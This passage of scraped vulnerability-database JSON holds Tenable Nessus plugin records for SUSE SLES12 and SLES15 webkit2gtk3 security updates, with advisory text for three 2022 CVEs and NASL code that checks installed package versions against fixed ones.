(SUSE-SU-2022:2522-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22662", "CVE-2022-22677", "CVE-2022-26710"], "modified": "2023-07-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:suse_linux:libwebkit2gtk3-lang", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2webextension-4_0", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2022-2522-1.NASL", "href": "https://www.tenable.com/plugins/nessus/163418", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:2522-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163418);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/13\");\n\n script_cve_id(\"CVE-2022-22662\", \"CVE-2022-22677\", \"CVE-2022-26710\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:2522-1\");\n\n script_name(english:\"SUSE SLES12 Security Update : webkit2gtk3 (SUSE-SU-2022:2522-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES12 / SLES_SAP12 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2022:2522-1 advisory.\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security\n Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose\n sensitive user information. (CVE-2022-22662)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling. This issue\n is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. Video self-preview in a webRTC call may be\n interrupted if the user answers a phone call. (CVE-2022-22677)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and\n iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may\n lead to arbitrary code execution. (CVE-2022-26710)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1201221\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-22662\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-22677\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-26710\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-July/011627.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e9f652b7\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22662\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-26710\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)(?:_SAP)?\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12|SLES_SAP12)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES12 / SLES_SAP12', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(2|3|4|5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES12 SP2/3/4/5\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES_SAP12\" && (! preg(pattern:\"^(4|5)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES_SAP12 SP4/5\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-2.102.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-2.102.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-2.102.1', 'sp':'4', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-2.102.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-2.102.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-2.102.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-2.102.1', 'sp':'4', 'cpu':'x86_64', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.4']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-2.102.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-2.102.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-2.102.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-2.102.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-2.102.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-2.102.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-2.102.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'webkit2gtk3-devel-2.36.4-2.102.1', 'sp':'5', 'release':'SLES_SAP12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-12.5']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-2.102.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'webkit2gtk3-devel-2.36.4-2.102.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sle-sdk-release-12.5', 'sles-release-12.5']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-2.102.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-2.102.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-2.102.1', 'sp':'2', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-2.102.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-2.102.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-2.102.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-2.102.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'webkit2gtk3-devel-2.36.4-2.102.1', 'sp':'2', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.2']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-2.102.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-2.102.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-2.102.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-2.102.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-2.102.1', 'sp':'3', 'cpu':'x86_64', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.3']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-2.102.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-2.102.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-2.102.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-2.102.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-2.102.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-2.102.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-2.102.1', 'sp':'4', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.4']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-2.102.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-2.102.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-2.102.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-2.102.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-2.102.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-2.102.1', 'sp':'5', 'release':'SLES12', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['sles-release-12.5']}\n];\n\nvar ltss_caveat_required = FALSE;\nvar flag = 0;\nforeach var package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var sp = NULL;\n var _cpu = NULL;\n var exists_check = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) _cpu = package_array['cpu'];\n if (!empty_or_null(package_array['exists_check'])) exists_check = package_array['exists_check'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (exists_check) {\n var check_flag = 0;\n foreach var check (exists_check) {\n if (!rpm_exists(release:_release, rpm:check)) continue;\n if ('ltss' >< tolower(check)) ltss_caveat_required = TRUE;\n check_flag++;\n }\n if (!check_flag) continue;\n }\n if (rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n var ltss_plugin_caveat = NULL;\n if(ltss_caveat_required) ltss_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check contains fixes that apply to\\n' +\n 'packages only available in SUSE Enterprise Linux Server LTSS\\n' +\n 'repositories. Access to these package security updates require\\n' +\n 'a paid SUSE LTSS subscription.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + ltss_plugin_caveat\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libjavascriptcoregtk-4_0-18 / libwebkit2gtk-4_0-37 / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-07-14T08:44:55", "description": "The remote SUSE Linux SLES15 / SLES_SAP15 host has packages installed that are affected by multiple vulnerabilities as referenced in the SUSE-SU-2022:2524-1 advisory.\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose sensitive user information. (CVE-2022-22662)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling. This issue is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. Video self-preview in a webRTC call may be interrupted if the user answers a phone call. (CVE-2022-22677)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may lead to arbitrary code execution. (CVE-2022-26710)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-07-23T00:00:00", "type": "nessus", "title": "SUSE SLES15 Security Update : webkit2gtk3 (SUSE-SU-2022:2524-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-22662", "CVE-2022-22677", "CVE-2022-26710"], "modified": "2023-07-13T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:suse_linux:libwebkit2gtk3-lang", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2-4_0", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2webextension-4_0", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk3-devel", "cpe:/o:novell:suse_linux:15"], "id": "SUSE_SU-2022-2524-1.NASL", "href": "https://www.tenable.com/plugins/nessus/163419", "sourceData": "##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# SUSE update advisory SUSE-SU-2022:2524-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(163419);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/13\");\n\n script_cve_id(\"CVE-2022-22662\", \"CVE-2022-22677\", \"CVE-2022-26710\");\n script_xref(name:\"SuSE\", value:\"SUSE-SU-2022:2524-1\");\n\n script_name(english:\"SUSE SLES15 Security Update : webkit2gtk3 (SUSE-SU-2022:2524-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SLES15 / SLES_SAP15 host has packages installed that are affected by multiple vulnerabilities as\nreferenced in the SUSE-SU-2022:2524-1 advisory.\n\n - A cookie management issue was addressed with improved state management. This issue is fixed in Security\n Update 2022-003 Catalina, macOS Big Sur 11.6.5. Processing maliciously crafted web content may disclose\n sensitive user information. (CVE-2022-22662)\n\n - A logic issue in the handling of concurrent media was addressed with improved state handling. This issue\n is fixed in macOS Monterey 12.4, iOS 15.5 and iPadOS 15.5. Video self-preview in a webRTC call may be\n interrupted if the user answers a phone call. (CVE-2022-22677)\n\n - A use after free issue was addressed with improved memory management. This issue is fixed in iOS 15.5 and\n iPadOS 15.5, macOS Monterey 12.4, tvOS 15.5, watchOS 8.6. Processing maliciously crafted web content may\n lead to arbitrary code execution. (CVE-2022-26710)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/1201221\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-22662\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-22677\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-26710\");\n # https://lists.suse.com/pipermail/sle-security-updates/2022-July/011629.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c1a0cdd0\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-22662\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2022-26710\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/07/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/07/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item(\"Host/SuSE/release\");\nif (isnull(os_release) || os_release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nvar os_ver = pregmatch(pattern: \"^(SLE(S|D)(?:_SAP)?\\d+)\", string:os_release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'SUSE');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15|SLES_SAP15)$\", string:os_ver)) audit(AUDIT_OS_NOT, 'SUSE SLES15 / SLES_SAP15', 'SUSE (' + os_ver + ')');\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'SUSE (' + os_ver + ')', cpu);\n\nvar service_pack = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(service_pack)) service_pack = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0|1)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES15 SP0/1\", os_ver + \" SP\" + service_pack);\nif (os_ver == \"SLES_SAP15\" && (! preg(pattern:\"^(0|1)$\", string:service_pack))) audit(AUDIT_OS_NOT, \"SLES_SAP15 SP0/1\", os_ver + \" SP\" + service_pack);\n\nvar pkgs = [\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150000.3.106.1', 'sp':'0', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'typelib-1_0-WebKit2WebExtension-4_0-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'webkit2gtk-4_0-injected-bundles-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'webkit2gtk3-devel-2.36.4-150000.3.106.1', 'sp':'0', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15']},\n {'reference':'libjavascriptcoregtk-4_0-18-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'libwebkit2gtk-4_0-37-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'libwebkit2gtk3-lang-2.36.4-150000.3.106.1', 'sp':'1', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'typelib-1_0-JavaScriptCore-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n {'reference':'typelib-1_0-WebKit2-4_0-2.36.4-150000.3.106.1', 'sp':'1', 'cpu':'x86_64', 'release':'SLES_SAP15', 'rpm_spec_vers_cmp':TRUE, 'exists_check':['SLES_SAP-release-15.1']},\n 